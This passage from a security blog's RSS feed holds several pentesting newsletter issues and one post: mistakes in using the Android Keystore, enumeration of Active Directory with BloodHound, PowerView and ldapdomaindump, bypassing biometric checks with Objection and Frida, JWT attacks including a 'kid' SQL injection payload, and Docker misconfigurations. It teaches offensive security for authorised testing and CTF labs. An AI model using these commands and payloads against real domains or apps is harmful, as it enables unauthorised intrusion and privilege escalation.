## 🧨 Common Developer Mistakes

The Keystore sounds great but it’s often misused. Here are the most common mistakes developers make, and what they really mean in practice:

#### Saving the encrypted data in external storage

&gt; _“But it’s encrypted, so it should be fine, right?”_

Even if you encrypt a secret using a Keystore key, storing the encrypted blob in public locations like `/sdcard/` or `Downloads/` is dangerous. Other apps or attackers can access it.

💥 **As an attacker**: Grab the encrypted file, hook the app with Frida, and dump the decrypted content when it’s used.

#### Not requiring user authentication to use the key

&gt; _“The key is stored in the TEE, that means it’s secure!”_

Not necessarily. If `setUserAuthenticationRequired(true)` wasn’t used during key creation, the app (and malware) can use the key at any time, even if the device is locked.

💥 **As an attacker**: Hook `Cipher.doFinal()` to decrypt data without unlocking the phone.

#### Assuming keys are hardware-backed

&gt; _“I’m using StrongBox, so the key is safe.”_

Many apps don’t check whether the key is truly stored in secure hardware. If not supported, Android silently falls back to software storage less secure and more exposed.

💥 **As an attacker**: On emulators or rooted devices, software Keystore keys are easier to extract or abuse.

✅ **Dev tip**: Use `KeyInfo.isInsideSecureHardware()` to verify.

#### Storing secrets directly in SharedPreferences

&gt; _“It’s just a token, I’ll store it in prefs for now.”_

Big mistake. `SharedPreferences` files are stored as plain XML. Even if encrypted, if not done properly with Keystore + internal storage, they can be exposed.

💥 **As an attacker**: Dump the preferences file or memory and extract the secret.

#### Hardcoding secrets or crypto keys in the source code

&gt; _“It’s just a small AES key for internal use.”_

Anything hardcoded in your app is recoverable. With tools like `jadx`, static secrets are one `Ctrl+F` away.

💥 **As an attacker**: Reverse the APK, extract the key, and decrypt any data protected with it.

## 🛠️ Tools of the Trade

Use these tools to detect and exploit poor Keystore usage:

-   **Frida** – Hook crypto functions like `Cipher.init` or `Cipher.doFinal`
-   **objection** – Quick Android app inspection &amp; dynamic testing
-   **MobSF** – Detect improper Keystore/API usage via static analysis
-   **jadx** – Reverse engineer APKs to detect hardcoded keys/secrets

### 🧪 Labs &amp; Practice

Unlike other issues, there’s no Hack The Box machine or CTF lab recommendation this time.  
Keystore vulnerabilities are highly app-specific and subtle there’s no standard environment that captures all the edge cases.  
So instead of following a guided challenge… you’ll have to get your hands dirty.

Here’s how you can practice:

#### 🔍 Option 1: Reverse a real app

Pick any Android app (even a simple one) and analyze how it handles sensitive data:

-   🔎 Use `jadx` or `MobSF` to decompile the APK
-   🔐 Look for `KeyGenParameterSpec`, `Cipher`, or `Keystore.getInstance`
-   🧩 Check if keys require authentication (`setUserAuthenticationRequired`)
-   🗝️ Check how secrets are encrypted and where they’re stored (internal? external? SharedPreferences?)
-   ⚔️ Hook the app with **Frida** and try to:
    -   Call `Cipher.doFinal()` directly
    -   Bypass biometric UI checks
    -   Extract secrets from memory

#### 🛠 Option 2: Build your own test app

Want full control over the environment? Write a minimal app that:

-   Generates a key using Android Keystore
-   Encrypts a token with that key
-   Asks for fingerprint before decrypting

Then try to break your own implementation:

-   What happens if you remove `setUserAuthenticationRequired(true)`?
-   Can you still decrypt the token with Frida or via memory dumps?
-   Can you extract the ciphertext from internal storage and reuse it?

## Final Thoughts

The Keystore isn’t a silver bullet. It’s a powerful tool but only if used properly.

As pentesters, we need to understand:

-   What the Keystore actually protects
-   What parts of the chain are still vulnerable (storage, memory, usage)
-   How to spot and exploit weak implementations

Next time you hear “don’t worry, it’s in the Keystore” smile, nod, and open up Frida.

Until next time,  
Stay sharp, stay testing,  
Ruben **🚀**</content:encoded><category>Newsletter</category><category>mobile-security</category><author>Ruben Santos</author></item><item><title>Active Directory Enumeration: Mapping the Kingdom Before the Siege</title><link>https://www.kayssel.com/newsletter/issue-8</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-8</guid><description>Usernames, sessions and hidden privilege paths: uncovering the domain’s true structure</description><pubDate>Sun, 08 Jun 2025 15:12:09 GMT</pubDate><content:encoded>## Introduction

Hey everyone!  
Biometrics may feel futuristic, but nothing beats the classic: Active Directory.  
When you&apos;re inside a Windows domain, the first real step isn&apos;t exploiting, it&apos;s mapping. Knowing who’s who, what’s what, and where the gold is.

In this issue, we’re diving into Active Directory enumeration. How to map users, groups, machines, permissions, and privilege paths that might lead you all the way to Domain Admin.

Let’s start drawing the map 👇

By the way, a while ago I published a full series on [Active Directory](https://www.kayssel.com/series/active-directory/) attacks and internals. [One of the chapters focuses specifically on post-compromise enumeration,](https://www.kayssel.com/post/introduction-to-active-directory-9-enumeration/) right after gaining access to a machine. If you want to go deeper, that’s a good place to start.

## 🏰 Why Enumeration Matters in AD

In an Active Directory environment, almost everything is an object: users, computers, groups, OUs, GPOs, ACLs... And most of this is readable by any authenticated user.

This means even with a low-privileged domain account or a compromised machine, you can:

-   Discover who the domain admins are
-   Find machines where they log in
-   Spot misconfigured ACLs that let you escalate
-   Build a path from “just a user” to “Domain Admin”

## 🛠 Tools of the Trade

Here are a few tools to get you started – but this is just the tip of the iceberg. I highly recommend exploring the space further, as there&apos;s a huge ecosystem of tools built for AD enumeration and attack path discovery.

Some highlights:

-   🕵️‍♂️ **BloodHound + SharpHound** – The classic for visualizing privilege escalation paths with a graph-based approach.
-   🐍 **python-bloodhound** – A Python-based collector that can be run remotely to feed BloodHound data without touching disk.
-   ⚡ **RustHound** – A blazing-fast SharpHound alternative written in Rust, optimized for stealth and performance.
-   🔍 **ldapsearch / ldapdomaindump** – Great for lightweight LDAP-based dumps of domain objects.
-   🧪 **PowerView** – PowerShell framework for comprehensive in-domain enumeration (flagged by AV, so use with caution).
-   🧰 **NetExec** – Modern fork of CrackMapExec that’s actively maintained and supports enumeration, lateral movement, and command execution.

## 👤 Enumerating Users

Finding users is often the first step.

### PowerView:

```powershell
Get-DomainUser
Get-DomainUser -Identity &quot;john.doe&quot;
```

### ldapsearch:

```bash
ldapsearch -x -h &lt;DC-IP&gt; -b &quot;dc=corp,dc=local&quot; &quot;(objectClass=user)&quot; sAMAccountName

```

### BloodHound:

```bash
SharpHound.exe -c All
```

Then load the output into BloodHound for full graph analysis of users, sessions, and access rights.

## 👑 Finding Domain Admins &amp; High-Value Targets

```powershell
Get-DomainGroupMember -Identity &quot;Domain Admins&quot;

```

Or visually through BloodHound → `Group: Domain Admins`.

💡 Also look for users in:

-   Enterprise Admins
-   Backup Operators (DCSync abuse)
-   DNSAdmins (can escalate to SYSTEM)
-   Delegated OUs with misconfigured rights

## 🖥️ Finding Machines and Sessions

Where do admins log in? That’s gold.

```powershell
Find-DomainUserLocation -UserName &quot;admin.user&quot;

```

Or let BloodHound highlight “HasSession” and “AdminTo” edges they show where sensitive users have logged in, and where you might hijack tokens or pivot.

## 🔐 Dumping ACLs &amp; Delegation Paths

AD is full of hidden privilege paths via misconfigured Access Control Entries (ACEs).

BloodHound + ACL collection mode:

```powershell
SharpHound.exe -c ACL

```

PowerView (if usable):

```powershell
Find-InterestingDomainAcl
Get-ObjectAcl -SamAccountName &quot;targetuser&quot; -ResolveGUIDs

```

Look for:

-   `GenericAll`, `GenericWrite`
-   `WriteOwner`, `WriteDACL`
-   `ForceChangePassword`

These flags can give full control over users, groups, or even entire OUs.

## 🧰 ldapdomaindump: Fast &amp; Clean

```powershell
ldapdomaindump -u &apos;corp.local\\lowuser&apos; -p &apos;Password123&apos; &lt;DC-IP&gt;

```

This will dump:

-   All users, groups, computers
-   Trust relationships
-   GPOs
-   Interesting flags like &quot;Password not required&quot;

Low noise. High value.

## 🗺️ Final Tips for Silent Recon

-   **Use targeted SharpHound collection** (e.g., `Session`, `ACL`, `Trusts`) to reduce noise.
-   **Prefer LDAP** over SMB or WinRM where possible, it&apos;s more stealthy.
-   **Log everything**. You may not see a privilege escalation path now, but one new session or credential can change the graph entirely.

## 🧪 Labs to Practice BloodHound Enumeration

BloodHound isn&apos;t just a visualization tool it’s a weapon. Mastering it means understanding how privileges and object relationships can be abused in AD environments. These labs will sharpen your skills on data collection, attack path discovery, and Cypher queries.

-   🎮 **Hack The Box – Blazorized**
    -   Set SPN on a user and identify the action in BloodHound
    -   Discover `GenericWrite` permissions to abuse login scripts
    -   Visualize the privilege path in the BloodHound interface  
        👉 _Good starting point with low-privilege enumeration and basic privilege abuse_
-   🎮 **Hack The Box – Fulcrum**
    -   Use BloodHound to enumerate users and group memberships  
        👉 _Basic recon with SharpHound, minimal complexity_
-   🎮 **Hack The Box – Axlle**
    -   Collect data with `BloodHound.py` and validate session info
    -   Compare results with SharpHound to detect gaps in the Python collector  
        👉 _Great for understanding collector limitations_
-   🎮 **Hack The Box – Certified**
    -   Run `BloodHound.py` and `SharpHound`
    -   Spot `WriteOwner`, `GenericAll`, and trace delegation paths  
        👉 _Mid-to-advanced level involving multiple attack paths and Cypher logic_
-   🎮 **Hack The Box – Rebound**
    -   Use `NetExec` to run Python collector
    -   Ingest and analyze BloodHound data for ACL abuse paths  
        👉 _Requires chaining tools and integrating enumeration into access flows_

## 🧭 Final Thoughts

Active Directory isn’t just a directory, it’s a jungle of objects, permissions, and hidden privilege paths.

And if you want to own the domain, you need to understand the map before you move.

Enumerate first. Attack second.  
Because knowledge, in AD, _is_ power.

Until next time,  
Stay quiet, stay mapping,  
Ruben 🚀</content:encoded><category>Newsletter</category><category>web3-security</category><author>Ruben Santos</author></item><item><title>Biometric Authentication: Pretty Face, Weak Shield?</title><link>https://www.kayssel.com/newsletter/issue-7</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-7</guid><description>How biometric checks fool developers and how you can fool them back.</description><pubDate>Sat, 31 May 2025 12:08:29 GMT</pubDate><content:encoded>Hey everyone!  
Biometrics are everywhere: unlocking your phone, approving a payment, signing a transaction. It _feels_ secure, like something only you can do. But when it comes to app security, that’s often just an illusion.

In this issue, we’re diving into biometric authentication, how it really works on iOS and Android, where developers usually fail, and how attackers (you!) can bypass it with Objection, Frida, or full-on reversing when needed.

Let’s pop the fingerprint scanner and peek inside 👇

## 🔍 What Is Biometric Authentication (Really)?

Biometric auth isn’t magic – it’s just a local decision mechanism.

When you authenticate using Face ID or a fingerprint:

1.  The OS compares your biometric input to a stored template.
2.  If it matches, the OS tells the app: “Yes, it’s the user.”
3.  The app then decides what that means – unlock the UI? Sign something? Grant access?

### On iOS

iOS apps use the `LocalAuthentication` framework with calls like:

```bash
LAContext().evaluatePolicy(.deviceOwnerAuthenticationWithBiometrics)

```

This shows the system Face ID / Touch ID prompt. If the check passes, the callback returns `true`.

That’s it.

Unless the developer explicitly binds this result to a cryptographic operation – for example, signing with a key stored in the Secure Enclave – there’s no guarantee the biometric result is real.

Also, many apps use key types (like `secp256k1`) that are not supported by Secure Enclave, forcing them to store the key in userland. Dangerous move.

### On Android

Android offers the `BiometricPrompt` API. Combined with Android Keystore, it can protect keys so they’re only usable after biometric auth.

Typical flow:

1.  BiometricPrompt asks for authentication.
2.  If successful, a key is unlocked in the Keystore.
3.  That key signs or decrypts something sensitive.

But if the app just reacts to `onAuthenticationSucceeded` without using real keys or enforcing cryptographic binding, it’s just as bypassable.

## 🕳️ Where It Fails: Common Developer Mistakes

Here’s where things tend to break:

### ❌ No Real Binding

Apps use biometrics as a fancy UI, but control access with:

-   A memory flag (`isAuthenticated = true`)
-   A value in Shared Preferences
-   Or just `if userPassedBiometric { unlock() }`

No cryptography. No attestation. Just vibes.

### 🔑 Weak Key Storage

Some apps generate a private key and use it to sign or decrypt data after biometric approval... but store the key:

-   In the standard keychain
-   Without Secure Enclave or biometric gating
-   Or worse, as a file in app storage (😬)

On jailbroken or rooted devices, this key can be extracted. Once you have it, you can:

-   Forge valid signatures
-   Emulate the biometric flow
-   Perform sensitive actions from a script

## 🧪 Techniques to Bypass Biometrics

Let’s get practical. Here are three techniques you can use depending on the platform and implementation.

### 🍏 iOS – Objection Biometric Bypass

On jailbroken devices, use [Objection](https://github.com/sensepost/objection):

```bash
objection --gadget &lt;app&gt; explore
ios ui biometric_bypass

```

This hooks `evaluatePolicy` and forces a successful return.  
If the app trusts that boolean without cryptographic binding – you’re in.

### 🤖 Android – Frida Fingerprint Bypass

Two great scripts from ReversecLabs:

-   [`fingerprint-bypass.js`](https://github.com/ReversecLabs/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js) – directly hooks biometric logic to always return success.
-   [`fingerprint-bypass-via-exception-handling.js`](https://github.com/ReversecLabs/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass-via-exception-handling.js) – forces exceptions to bypass checks.

These are effective when the app uses `BiometricPrompt` without proper Keystore protection.

### 🧠 And If None of That Works?

Time for reversing:

-   Decompile the APK or dump the IPA.
-   Trace where `evaluatePolicy` or `BiometricPrompt` is used.
-   Find the logic path that decides whether access is granted.
-   Identify flags, tokens, or keys involved and override or extract.

If it’s not cryptographically enforced, it’s probably bypassable.

## 🧪 Labs to Practice Biometric Bypass

The best way to understand how biometric authentication really works, and how to break it, is to build your own test environment.

I covered this exact topic in one of the [chapters](https://www.kayssel.com/post/android-7/) of my [mobile security](https://www.kayssel.com/series/android/) series unfortunately, only for Android for now. It includes how to set up a minimal app and the tools you need to simulate and exploit common biometric implementation mistakes.

## 🧭 Final Thoughts

Biometric auth feels secure, but without crypto-bound enforcement, it’s just UI sugar.

If you&apos;re a dev: use Secure Enclave or Android Keystore, and sign something real.  
If you&apos;re a pentester: hook, patch, or reverse your way in.

Until next time,  
Stay curious, stay subverting,  
Ruben 🚀</content:encoded><category>Newsletter</category><category>web3-security</category><author>Ruben Santos</author></item><item><title>The Anatomy of a JWT Hack</title><link>https://www.kayssel.com/newsletter/issue-6</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-6</guid><description>JWTs: Small Tokens, Big Mistakes</description><pubDate>Sun, 25 May 2025 16:30:49 GMT</pubDate><content:encoded>Hey everyone!  
Big day: the [**first chapter of my Docker + Rust series is out**](https://www.kayssel.com/post/docker-security-1/), and this newsletter drops alongside it! 🎉  
If you want to learn how container security works from the inside out, while watching me build a CLI tool ([Valeris](https://github.com/rsgbengi/valeris)) from scratch, go check it out on the blog.

But today, we&apos;re shifting gears from containers to credentials.  
Let’s talk about **JSON Web Tokens (JWTs)** those small Base64 blobs that silently carry identity and permissions across APIs. They&apos;re everywhere in modern web apps, and when implemented poorly, they open the door to serious attacks.

In this issue, we’ll explore what JWTs really are, how they work, and the most common ways they get hacked: from `alg: none` tricks to key injection and algorithm confusion attacks. Real bugs, real CVEs, real exploitation.

Let’s dive in 👇

# 🧩 What Are JWTs, and Why Do They Matter?

**JSON Web Tokens (JWTs)** are a compact way to represent claims between two parties. Think of them as signed JSON blobs used in web apps to handle sessions, permissions, and user identity without needing server-side state.

&lt;details&gt;
&lt;summary&gt;They look like this:&lt;/summary&gt;

```bash
&lt;base64url(header)&gt;.&lt;base64url(payload)&gt;.&lt;base64url(signature)&gt;

```
&lt;/details&gt;


Each section is Base64URL-encoded:

-   **Header** – specifies algorithm (`alg`) and token type (`typ`)
-   **Payload** – includes claims like `sub`, `admin`, `exp`, `iat`, etc.
-   **Signature** – ensures the data hasn’t been tampered with

&lt;details&gt;
&lt;summary&gt;Example payload:&lt;/summary&gt;

```bash
{
  &quot;sub&quot;: &quot;user1&quot;,
  &quot;admin&quot;: false
}

```
&lt;/details&gt;


JWTs are usually sent in an `Authorization: Bearer` header. And since the payload is not encrypted by default, anyone with the token can read it **but** they shouldn’t be able to modify it without invalidating the signature. That’s the theory… let’s see what happens in practice 👇

## 🔓 Signature Not Verified

This is the deadliest and most common mistake. Some developers use `decode()` to parse JWTs without verifying the signature with `verify()`.

If the backend skips signature verification:

-   You can edit any field (e.g., `admin: true`)
-   Keep or remove the signature altogether
-   And the server will accept it

📌 **Result:** total authentication and authorization bypass. You&apos;re basically the admin now.

## ❌ `alg: none` Attack

JWTs specify the signing algorithm in the header, and `alg: none` means… no signature.

Originally intended for debugging, some libraries (or careless configs) still allow it.

Attack flow:

1.  Change `&quot;alg&quot;` in the header to `&quot;none&quot;`
2.  Remove the signature part
3.  Modify the payload however you like
4.  Reassemble: `header.payload.`
5.  Send the token

📌 If accepted, the app is trusting unsigned data. Game over.

## 🧨 Weak HMAC Secrets (HS256 Brute Force)

When apps use **HS256**, the same key signs and verifies the token. If that key is weak (e.g., `secret`, `123456`, app name…), it can be brute-forced offline.

Steps:

-   Capture a valid JWT
-   Use tools like `hashcat` or `jwt-tool` to brute-force the key
-   Forge tokens with any payload you want

📌 This works especially well on dev/staging environments, open-source projects, and rushed setups.

## 🌀 Algorithm Confusion: RS256 ➜ HS256

This one is sneaky.

Suppose the app uses **RS256**, which relies on a private/public key pair:

-   The server signs with the private key
-   Verifies with the public key

But if it trusts the `alg` field from the JWT, you can:

-   Change `RS256` → `HS256`
-   Use the public key (which you might have) as the HMAC secret
-   Sign a token with your payload

📌 The server thinks it’s verifying with RSA, but it’s actually verifying a forged HMAC. Access granted.

## 🔀 Algorithm Confusion: ES256 ➜ HS256

Same idea, different algorithm. Instead of RSA, the server uses **ECDSA (ES256)**.

If the app doesn&apos;t enforce the expected algorithm:

-   Change `alg: ES256` to `HS256`
-   Use the ECDSA public key as HMAC secret
-   Sign your payload

📌 Another case of mixing asymmetric and symmetric crypto. And attackers love it.

## 🪤`kid` Injection (Key ID Manipulation)

JWTs can include a `kid` field in the header to indicate which key should be used to verify the token.

But if the app:

-   Loads keys from file system using `kid`, or
-   Performs a raw DB query with `kid`

Then you can do things like:

-   `kid: ../../../../dev/null` → server reads empty key
-   `kid: &apos; UNION SELECT &apos;fake-key&apos; --` → SQL injection

📌 Used correctly, you can point the app to a key you control, or force it to use a blank key and sign your own tokens.

## 🧬 Embedded JWK (CVE-2018-0114)

JWTs also support an optional `jwk` field that embeds the public key directly in the token header.

If the server accepts any key from this field without validation, it’s vulnerable.

Attack:

-   Generate your own RSA key pair
-   Sign the JWT with your private key
-   Embed the public key in the `jwk` header
-   Send it

📌 The app uses your embedded key to verify your fake token. Total bypass.

## 🌐 JKU / X5U Header Abuse

The `jku` and `x5u` fields let a token point to external URLs for keys or certs.

If the backend:

-   Fetches these keys dynamically
-   Doesn’t validate where they come from

Then attackers can:

-   Host their own JWKS or X.509 cert
-   Sign the token with their private key
-   Insert `jku`/`x5u` to point at their hosted key
-   Send the forged token

📌 This isn’t just key injection it can also be a vector for SSRF.

## 🧪 Claim Confusion (Missing `aud`, `iss`, `sub` Checks)

If an app doesn’t validate claims like `audience` or `issuer`, attackers can:

-   Use tokens issued for a different service
-   Reuse tokens across microservices or APIs
-   Escalate privileges horizontally

📌 This is surprisingly common in modern, distributed architectures.

## ⏳ No Expiration / Long-Lived Tokens

JWTs should expire fast. If a token has:

-   No `exp`, or
-   An `exp` set to years in the future

Then:

-   It can be reused forever
-   Attackers can persist access indefinitely

📌 Often paired with other techniques to maintain access after compromise.

# 🛠 Tools for JWT Hacking

Keep it lean, sharp, and fast. These are the essentials:

-   **`jwt-tool`**: All-in-one CLI to decode, tamper, brute-force, and test JWT vulnerabilities.  
    👉 [`ticarpi/jwt_tool`](https://github.com/ticarpi/jwt_tool)
-   **Hashcat**: Brute-force HMAC secrets (HS256/HS512) offline with GPU power.  
    👉 Mode `16500` for HS256
-   **Burp Suite + JWT Editor**: Decode, modify, re-sign JWTs on the fly. Great for testing `alg`, `kid`, `jku`, and more.
-   **TruffleHog / Gitleaks**: Scan repos for leaked JWTs or weak secrets. Great for recon.

# 🧪 Where to Practice

Want to test these attacks in the wild (safely)? Here’s where to train:

-   **🎯 PortSwigger Web Security Academy**
    -   Realistic JWT labs: signature bypass, weak key brute-forcing, and header abuse
    -   👉 Great for hands-on skill building
-   **🎮 Hack The Box – Craft**
    -   Combine Git recon with JWT forging and signature cracking
    -   👉 Perfect mix of theory + practice
-   **🎮 Hack The Box – Awkward**
    -   Crack JWTs with Hashcat, forge tokens, and exploit logic flaws
    -   👉 Covers HS256 abuse, scripting, and privilege escalation
-   **🎮 Hack The Box – Yummy**
    -   Exploit weak RSA keys using `RsaCtfTool` to forge JWTs
    -   👉 Learn how broken crypto affects JWTs in real apps
-   **🎮 Hack The Box – CyberMonday**
    -   Perform an **RS256 ➝ HS256** algorithm confusion attack using the server&apos;s public key
    -   👉 Realistic and highly relevant vulnerability
-   **🎮 Hack The Box – Luke**
    -   Find and crack the JWT secret, forge tokens, and access protected APIs
    -   👉 End-to-end JWT manipulation and scripting practice
-   **🎮 Hack The Box – Blazorized**
    -   Extract hardcoded JWTs from DLLs and inspect traffic for insecure storage
    -   👉 Mix of reverse engineering and token abuse

## 🧭 Final Thoughts

JWTs are everywhere: APIs, mobile apps, single sign-on flows. And when mishandled, they can be your easiest way in.

Start by understanding how they work. Then test. Tamper. Re-sign. Exploit.

Whether you&apos;re a pentester, bug hunter, or dev, knowing how to break JWTs means knowing how to protect them.

Until next time,  
Stay sharp, stay curious,  
Ruben 🚀</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Docker Security: Dissecting Namespaces, cgroups, and the Art of Misconfiguration</title><link>https://www.kayssel.com/post/docker-security-1</link><guid isPermaLink="true">https://www.kayssel.com/post/docker-security-1</guid><description>Docker uses namespaces, cgroups &amp; OverlayFS for isolation, but misconfigs (root, --privileged, sensitive mounts) weaken security. Valeris, a Rust CLI, audits running containers, flags risks, and provides a checklist to harden deployments.</description><pubDate>Sun, 25 May 2025 16:16:34 GMT</pubDate><content:encoded># TL;DR

-   Understand how Docker containers isolate processes with **namespaces**, **cgroups**, and **OverlayFS**.
-   See why isolation ≠ security, and where common misconfigurations open real attack paths.
-   Meet **Valeris**, a Rust CLI that audits running containers for dangerous defaults.
-   Walk away with a checklist to keep your next deploy out of the breach headlines.

# Welcome to the Series

If you’ve followed my work, you know I love application security testing. Lately, more clients rely on Docker and Kubernetes, yet I hadn’t explored the internals deeply until now.

To make this journey practical (and fun) I’m building **Valeris**, a Rust‑based CLI that scans running containers for misconfigurations. It’s part learning project, part real‑world utility and you get to watch (or help!) while I build.

In this first chapter:

-   You’ll learn what Docker is and how It works.
-   I’ll introduce Valeris and show you how it works.
-   And we’ll look at some common misconfigurations it can already detect.

Let’s go.

# What Is Docker?

Docker is a platform that lets you package an app, its dependencies, and its environment into a container: a lightweight “virtual box” that shares the host’s kernel but runs in its own isolated space.

But what does that really mean?

When you run a Docker container, you’re not launching a full operating system like you would with a virtual machine. Instead, you&apos;re starting a regular process on the host... but with some clever isolation tricks applied. These tricks are built into the Linux kernel and revolve around three key mechanisms:

1.  **Namespaces** – what a process can _see_
2.  **Control groups (cgroups)** – what a process can _use_
3.  **Overlay (Union) File Systems** – what a process can _write_

Let’s break them down.

## **Namespaces – The illusion of being alone**

Namespaces are like tinted glasses for processes. They **limit what a process can see or interact with** in the system.

&gt; Think of them as &quot;personal illusions&quot; applied to a process:  
&gt; it _thinks_ it&apos;s alone, but really it’s just been put in a carefully crafted sandbox.

Each namespace type controls a different part of that illusion:

| Namespace | What it isolates | Analogy |
|-----------|------------------|---------|
| `pid` | Process IDs (PIDs) | The process thinks it&apos;s PID 1 (like init) |
| `net` | Network interfaces, IPs, routes | Gets its own &quot;private&quot; network |
| `mnt` | Mount points / filesystems | Sees only its own mounted directories |
| `uts` | Hostname and domain name | Can call itself `vuln-container.local` |
| `ipc` | Shared memory (semaphores, etc.) | Can&apos;t talk to other processes via shared mem |
| `user` | UID/GID mappings | Can map its own root user differently |
| `cgroup` | cgroup membership | Hides host resource limits |

Without namespaces:

-   A process sees all other running processes.
-   It shares the same network as the host.
-   It can access the same filesystem mounts.

With namespaces:

-   A process only sees its own little world.
-   It thinks it&apos;s PID 1 (like a fresh OS).
-   Its network is isolated, its mounts are separated, and its hostname can be totally fake.

#### And how does Docker apply this?

Docker uses a Linux syscalls called `clone(2)`and `unshare(2)` under the hood to create new namespaces when launching a container.

&lt;details&gt;
&lt;summary&gt;So when you type:&lt;/summary&gt;

```bash
docker run debian:stable-slim

```
&lt;/details&gt;


Docker is actually doing something like:

&gt; &quot;Hey kernel, create a new process, but isolate it using these namespaces: PID, NET, MNT, UTS, USER… and maybe don’t tell it it’s just a guest.&quot;

That’s how each container ends up with its own environment, while still running on the same kernel as everything else.

## Control Groups (cgroups) – Resource management for grown-ups

While **namespaces** handle what a process can _see_, **control groups (cgroups)** control **what a process can _use_**.

&gt; Think of cgroups as the resource police:  
&gt; “You get two CPU cores, 512MB of RAM, and _that’s it_. No exceptions.”

In simple terms, **cgroups limit, measure, and isolate resource usage** of processes or groups of processes.

Here&apos;s what you can control:

| Resource | Example usage |
|----------|---------------|
| **CPU** | Limit a container to 1 core, or 50% CPU time |
| **Memory** | Cap RAM usage (and trigger OOM when exceeded) |
| **I/O** | Limit disk read/write speeds |
| **PIDs** | Limit how many processes it can spawn |
| **Network** | Limit bandwidth (with more advanced setups) |

Each cgroup is like a sandbox with a budget: it doesn’t care what the app is doing, but it ensures the app can’t exceed what it&apos;s allowed.

## OverlayFS - Layer cake for containers

&gt; While **namespaces** isolate what a process _sees_, and **cgroups** limit what a process _uses_,  
&gt; the **union file system** makes sure containers don’t accidentally trash your disk (or each other’s).

That’s right Docker containers don’t get a blank hard drive every time they start. Instead, Docker uses **OverlayFS** (a type of Union FS) to simulate a complete filesystem by **stacking multiple layers**.

Building a Docker container is like assembling a cake:

1.  🎂 At the bottom: a **read-only base image** (e.g. `debian:stable`).
2.  🧁 Next layer: your installed packages (`nginx`, `python`, etc.).
3.  🍒 Then: your app files and configurations.
4.  ✍️ At the top: a **writable layer** that&apos;s unique to this running container.

When your container runs:

-   It **reads** files by scanning top-down through the layers.
-   It **writes** by copying files into the top writable layer only.

This technique is called **copy-on-write**, and it means:

-   Base layers remain untouched,
-   Changes are container-specific,
-   And teardown is fast, just discard the top layer.

This is useful because thanks to this Docker can:

-   Reuse the same base images efficiently.
-   Build fast, thanks to cached and layered image construction.
-   Stay isolated even if 10 containers use `debian`, they don’t overwrite each other.
-   Can be destroyed and rebuilt instantly, because only the writable layer is ephemeral.

Without this, each container would be a complete copy, slow, heavy, and repetitive.

# Automating the Hunt for Misconfigurations

Now that we’ve covered the basics of how Docker works, let’s talk about the _real_ reason we&apos;re here: misconfigurations.

As you might imagine, there are **plenty of ways to configure a container poorly**, making it vulnerable to privilege escalation, data leaks, or even host compromise. Some classic examples include:

-   Running the container as **root** (no user restrictions at all),
-   Using the `--privileged` flag (which disables most security protections),
-   Mounting sensitive directories like `/proc` or `/var/run/docker.sock`,
-   Leaking secrets through environment variables like `API_KEY`, `DB_PASSWORD`, or AWS credentials.

So yeah Docker’s isolation isn’t magic. And misconfigurations are surprisingly common, especially in fast-paced environments where security isn&apos;t always a priority.

That’s why I wanted to create a tool that could automate the process of identifying these weak configurations. Not just to save time, but to help me learn the ins and outs of container security along the way.

Yes, I know there are excellent tools out there already like **Trivy**, **Dockle**, and **docker-bench-security** and they’re incredibly powerful. But I strongly believe that building something from scratch gives you a deeper understanding of how things really work. And honestly? It’s more fun that way.

## What is Valeris?

**Valeris** is a CLI tool I’m building in Rust to audit Docker (and soon Kubernetes) containers. It scans running containers for misconfigurations that could lead to real security issues. Things like root containers, excessive privileges, dangerous mounts, and exposed secrets.

The best part? I’m building it from scratch as I learn, and documenting the process in this blog series. It’s both a learning journey and (hopefully) a tool that can be genuinely useful.

Valeris is designed with a plugin-based architecture, which means:

-   It’s easy to extend as I learn more.
-   Each plugin can focus on a specific risk (e.g., user privileges, mounts, networking).
-   It makes it easier to explain concepts clearly in the blog, one layer at a time.

### What Valeris Can Already Do

Right now, Valeris can help with a few key checks:

-   Detect if a container is running as the root user.
-   Check if it’s mounting sensitive folders like `/proc` or `/sys`.
-   Report network exposure, such as open ports or host networking.
-   Find environment variables that contain common secret patterns.

It’s still early-stage, but even these basic checks already help streamline container audits.

## Why build this in Rust?

Glad you asked. I chose Rust because:

-   I wanted to learn it in a real-world context.
-   It gives me a tool that’s fast, memory-safe, and future-proof.
-   It’s widely used in Web3 and infrastructure tooling, which aligns with my interests.
-   And honestly? Rust makes you write better code even if it makes you suffer a little at first.

Also: building a tool while learning is painful… but extremely rewarding.

# Wrapping Up

So, Docker is powerful but also dangerously easy to misconfigure. In this first chapter, we’ve seen what containers _really_ are, why isolation isn&apos;t bulletproof, and how tools like Valeris can help flag the things that most people forget (or ignore) when deploying.

But this is just the beginning.

### What’s Next?

In the next chapter:

-   We&apos;ll create a _vulnerable on purpose_ container setup.
-   We’ll scan it with Valeris and walk through the results.
-   And we’ll dig into how the plugin system works under the hood how each security check is actually performed.

# Useful links

-   🔗 [GitHub Repo](https://github.com/rsgbengi/valeris)
-   📝 [Blog + upcoming chapters](https://www.kayssel.com/series/docker-security/)
-   ⭐ Give it a star if you like the project

# Resources

Docker. “Docker Engine Security Documentation.” Available at: [https://docs.docker.com/engine/security/](https://docs.docker.com/engine/security/)

man7.org. “namespaces(7) – Linux Manual Page.” Available at: [https://man7.org/linux/man-pages/man7/namespaces.7.html](https://man7.org/linux/man-pages/man7/namespaces.7.html)

The Linux Kernel Documentation. “Control Group v2.” Available at: [https://docs.kernel.org/admin-guide/cgroup-v2.html](https://docs.kernel.org/admin-guide/cgroup-v2.html)

The Linux Kernel Documentation. “Overlay Filesystem.” Available at: [https://docs.kernel.org/filesystems/overlayfs.html](https://docs.kernel.org/filesystems/overlayfs.html)

Aqua Security. “Trivy” Available at: [https://trivy.dev/latest/](https://trivy.dev/latest/)

Good with Tech. “Dockle: Container Image Linter for Security.” Available at: [https://github.com/goodwithtech/dockle](https://github.com/goodwithtech/dockle)

